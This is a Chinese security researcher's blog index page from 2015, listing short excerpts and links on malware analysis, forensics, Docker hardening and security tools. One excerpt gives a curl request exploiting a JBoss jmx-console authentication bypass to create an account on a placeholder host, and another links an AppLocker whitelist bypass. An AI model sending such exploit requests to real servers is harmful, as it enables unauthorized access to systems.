自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

cnbird's blog

cnbird's blog

  • 博客(31)
  • 资源 (2)
  • 收藏
  • 关注

原创 docker malware分析

https://remnux.org/docs/containers/run-apps/

2015-02-28 23:11:09 1239

原创 sans webcast

https://www.sans.org/webcasts/archive/2015

2015-02-28 22:36:30 1060

原创 windows event logs分析

登陆日志4624  谁从哪里登陆,什么时间登陆4627 管理员5140 从哪里发起了共享连接计划任务106 - jobname,who,time200 - start time and programe name201 - finish name141 - clean up

2015-02-28 22:13:41 1912

转载 Deepsec 2014 - Memory Forensics And Security Analytics - Detecting Unknown Malware

http://www.securitytube.net/video/12541

2015-02-27 19:27:31 1104

转载 Docker Secure Deployment Guidelines

https://github.com/GDSSecurity/Docker-Secure-Deployment-GuidelinesDocker Secure Deployment GuidelinesWithin today’s growing cloud-based IT market, there is a strong demand for virt

2015-02-26 21:00:10 1591

转载 JetLeak Vulnerability: Remote Leakage Of Shared Buffers In Jetty Web Server [CVE-2015-2080]

OVERVIEWGDS discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests submitted to

2015-02-26 20:48:09 1473

转载 Fundamental Computer Investigation Guide for Windows

https://technet.microsoft.com/en-us/library/cc162846.aspx

2015-02-26 11:15:51 920

原创 Oracle Forensics t00ls

logminerverity data block examiner cadfile

2015-02-26 09:51:56 1116 1

原创 FINDING UNKNOWN MALWARE

http://www.securitytube.net/video/12402http://www.securitytube.net/video/12401

2015-02-25 18:55:36 916

转载 Security Considerations for AppLocker

https://technet.microsoft.com/en-us/library/ee844118(WS.10).aspxbypass whitelisthttps://gist.github.com/cnbird1999/13735007b945a54ef981

2015-02-25 13:08:13 1013

原创 INFRASTRUCTURE TRACKING WITH PASSIVE MONITORING AND ACTIVE PROBING

https://www.youtube.com/watch?v=yJl4TTdnVpw

2015-02-25 09:56:34 944

原创 Virus Bulletin malware分析杂志以及paper

https://www.virusbtn.com/virusbulletin/archive/indexhttps://www.virusbtn.com/conference/vb2014/programme/index

2015-02-24 11:19:34 1025

原创 malware分析视频

https://www.youtube.com/user/virusbtn

2015-02-17 14:26:59 1136

原创 Security Analytics: Detecting Advanced Threats and Fraud

https://www.brighttalk.com/webcast/574/136917

2015-02-17 11:17:28 1191

转载 犯罪心理学

http://open.163.com/movie/2011/9/A/B/M8CCJHF2G_M8CCM0SAB.html

2015-02-16 16:35:07 1205

原创 track your activties

https://disconnect.me/https://github.com/mozilla/lightbeamhttps://www.youtube.com/watch?v=6QuvsevrxN0

2015-02-16 15:45:27 1373

转载 opensource sandbox

mandingohttps://code.google.com/p/mandingo/w/list

2015-02-16 14:06:24 1154

转载 Practically Exploiting MS15-014 and MS15-011

If you’re reading this then you’ve probably seen all the media coverage over the last couple of days surrounding MS15-011 and MS15-014. These bulletins resolve issues in Microsoft’s group policy eng

2015-02-16 14:03:34 1294

原创 2015年关注的技术书籍

1. 八月出版的Advanced Malware Analysis(卧槽)http://www.amazon.com/Advanced-Malware-Analysis-Christopher-Elisan/dp/0071819746/ref=sr_1_45?s=books&ie=UTF8&qid=1424064882&sr=1-452.Network Attacks and

2015-02-16 13:50:37 1797

原创 collective intelligence framework

http://www.securitytube.net/video/12388https://code.google.com/p/collective-intelligence-framework/https://github.com/collectiveintel/cif-v1

2015-02-16 12:43:05 1552

原创 opensource dpi

http://www.networksecuritytoolkit.org/nst/index.htmlndpiopendpi

2015-02-16 09:59:30 756 1

原创 opensecuritytraining video

https://www.youtube.com/user/OpenSecurityTraining/playlists

2015-02-16 09:42:48 828

转载 Linux的capability深入分析

http://www.cnblogs.com/iamfy/archive/2012/09/20/2694977.html一)概述:1)从2.1版开始,Linux内核有了能力(capability)的概念,即它打破了UNIX/LINUX操作系统中超级用户/普通用户的概念,由普通用户也可以做只有超级用户可以完成的工作.2)capability可以作用在进程上(受限)

2015-02-16 09:37:54 2095

转载 SiLK, the System for Internet-Level Knowledge, is a collection of traffic analysis tools

https://tools.netsa.cert.org/silk/

2015-02-14 16:07:04 1099

转载 OpenSource security vulnerability aggregator (web scraper) and search engine

可以根据这个框架编写一些exploit收集的网站https://github.com/evanlouie/security

2015-02-13 17:03:45 954

原创 非常经典的SANS培训课程

http://www.sans.org/find-training/

2015-02-08 21:13:29 2082

转载 malware analysis

http://www.goodreads.com/shelf/show/malware

2015-02-05 22:48:45 1102

转载 common sense security framework

http://www.commonsenseframework.org/wp-content/uploads/2015/01/Common-Sense-Security-Framework-v1.1.pdf

2015-02-05 22:06:49 1222

转载 Distributed Port Scanning: Creating an Nmap Cluster Using DNmap

http://raidersec.blogspot.tw/2013/01/distributed-port-scanning-creating-nmap.htmlfabrichttp://www.fabfile.org/

2015-02-05 18:18:57 1262

转载 jboss 认证绕过漏洞利用的另外一种方式添加用户

curl -I"http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser

2015-02-05 13:02:04 3718

转载 GitHub上的十一款热门开源安全工具

http://os.51cto.com/art/201409/450682.htm

2015-02-03 22:46:07 1238

附件2 金融行业信息系统信息安全等级保护测评指南(报批稿)

附件2 金融行业信息系统信息安全等级保护测评指南(报批稿)

2013-06-21

ISO 27000中文系列

ISO 27000中文系列主要是包括iso 27001 ISO 27002实施指南 iso 27003风险评估指南

2010-07-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除